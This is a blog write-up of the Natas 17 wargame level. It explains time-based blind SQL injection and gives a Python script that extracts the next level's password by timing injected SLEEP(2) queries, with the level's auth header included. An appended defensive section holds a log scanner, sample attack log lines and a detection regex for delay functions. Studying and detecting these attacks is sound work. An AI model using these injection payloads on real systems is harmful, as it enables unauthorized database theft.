Monday, November 10, 2014

Natas 17

From the welcome page, it looks like Natas 17 will be some kind of SQL injection again.

Looking through the code, the request parameters are again passed directly into the SQL query, but this time the output that would be displayed back to us is commented out.

This is a problem because it no longer matters what the query returns -- in all cases, there is no visible response.

We can, however, use a side channel such as the time it takes for the SQL query to execute. This is the first example of a "blind" SQL injection so far.

I wrote a quick Python script that automates constructing the query so that if a guess of a substring of the password is correct, the query will sleep for 2 seconds. The script then tracks how long each web request takes to return and uses the timing information to decide whether the guessed password substring was correct.

Here's the code:

# Python 2 (urllib2). The start of the URL in make_url was cut off in the
# original post, so the host and query prefix are a placeholder here.
import urllib2
from datetime import datetime

auth_head = 'Basic bmF0YXMxNzo4UHMzSDBHV2JuNXJkOVM3R21BZGdRTmRraFBrcTljdw=='
alphanumerics = map(chr, range(65, 91) + range(97, 123) + range(48, 58))

# Everything up to the position argument was truncated in the original post.
URL_PREFIX = "<truncated in original post>"

def make_url(char, start):
    # Guess one character at position `start`: if it matches, the injected
    # SLEEP(2) runs; otherwise the AND short-circuits and the page returns at once.
    return URL_PREFIX + "," + str(start) + ",1))=ASCII(%22" + str(char) + "%22)%20AND%20SLEEP(2)%20AND%20%22a%22=%22a&debug=true"

def is_correct(char, start):
    #print make_url(char, start), "-->",
    req = urllib2.Request(make_url(char, start))
    req.add_header("Authorization", auth_head)
    t1 = datetime.now()
    response = urllib2.urlopen(req).read()
    t2 = datetime.now()
    #print (t2 - t1).seconds
    # A correct guess makes the query sleep ~2 s; anything over 1 s counts as a hit.
    return (t2 - t1).seconds > 1

password = ""

# Natas passwords are 32 characters long.
while len(password) < 32:
    print "Password =", password
    for char in alphanumerics:
        if is_correct(char, len(password) + 1):
            #print "correct! -->", char
            password = password + char

print password
print "Woohoo!"

The script takes a few minutes to run, but the result is the password for natas18!
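A defender's counterpart to the script above, added here as an example and not code from the original post: it scans web-server access logs for the delay primitives time-based blind SQL injection depends on, and for the hit/miss timing pattern a comparison-gated SLEEP(2) produces. It assumes Apache combined-format lines with a trailing %D (request time in microseconds) field; the log lines and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample log (Apache combined format + trailing %D microseconds).
# One ordinary user, then four probes from one client: two SLEEP(2) hits,
# one whose AND-gated condition is false (so no sleep), one double-encoded.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Nov/2014:12:00:01 +0000] "GET /index.php?username=alice HTTP/1.1" 200 512 "-" "Mozilla/5.0" 1830
10.0.0.5 - - [10/Nov/2014:12:00:02 +0000] "GET /index.php?username=x%22%20AND%20SLEEP(2)%20AND%20%22a%22=%22a&debug=true HTTP/1.1" 200 498 "-" "Python-urllib/2.7" 2004113
10.0.0.5 - - [10/Nov/2014:12:00:04 +0000] "GET /index.php?username=x%22%20AND%201=2%20AND%20SLEEP(2)%20AND%20%22a%22=%22a&debug=true HTTP/1.1" 200 498 "-" "Python-urllib/2.7" 18402
10.0.0.5 - - [10/Nov/2014:12:00:05 +0000] "GET /index.php?username=x%22%20AND%20SL%2545EP(2)%20AND%20%22a%22=%22a HTTP/1.1" 200 498 "-" "Python-urllib/2.7" 2010221
10.0.0.5 - - [10/Nov/2014:12:00:07 +0000] "GET /index.php?username=x%22%20AND%20SLEEP(2)%23 HTTP/1.1" 200 498 "-" "Python-urllib/2.7" 2003877
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "[^"]*" (?P<usec>\d+)$')
# Delay primitives (MySQL, PostgreSQL, MSSQL) that time-based blind SQLi relies on.
DELAY_RE = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.I)
SLOW_SECONDS = 1.5  # well above normal latency, below the injected SLEEP(2)

def decode(path):
    """URL-decode until stable, so %2545-style double encoding cannot hide a keyword."""
    prev = None
    while path != prev:
        prev, path = path, unquote(path)
    return path

def analyze(lines, slow_seconds=SLOW_SECONDS):
    """Per client: total requests, requests carrying a delay primitive, slow requests."""
    stats = defaultdict(lambda: {"requests": 0, "delay_payloads": 0, "slow": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production tool would count these too
        s = stats[m["ip"]]
        s["requests"] += 1
        if DELAY_RE.search(decode(m["path"])):
            s["delay_payloads"] += 1
        if int(m["usec"]) / 1e6 >= slow_seconds:
            s["slow"] += 1
    return dict(stats)

def suspicious_clients(stats, min_slow=3):
    """Flag any client sending a delay primitive, or one with a run of slow requests:
    the hit/miss timing pattern survives even when the keyword itself is obfuscated."""
    return sorted(ip for ip, s in stats.items()
                  if s["delay_payloads"] or s["slow"] >= min_slow)
```

Keyword matching alone is noisy (a legitimate `sleep=` parameter would trip a naive check), which is why the regex requires the call syntax and the slow-request count is kept as a second, independent signal.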
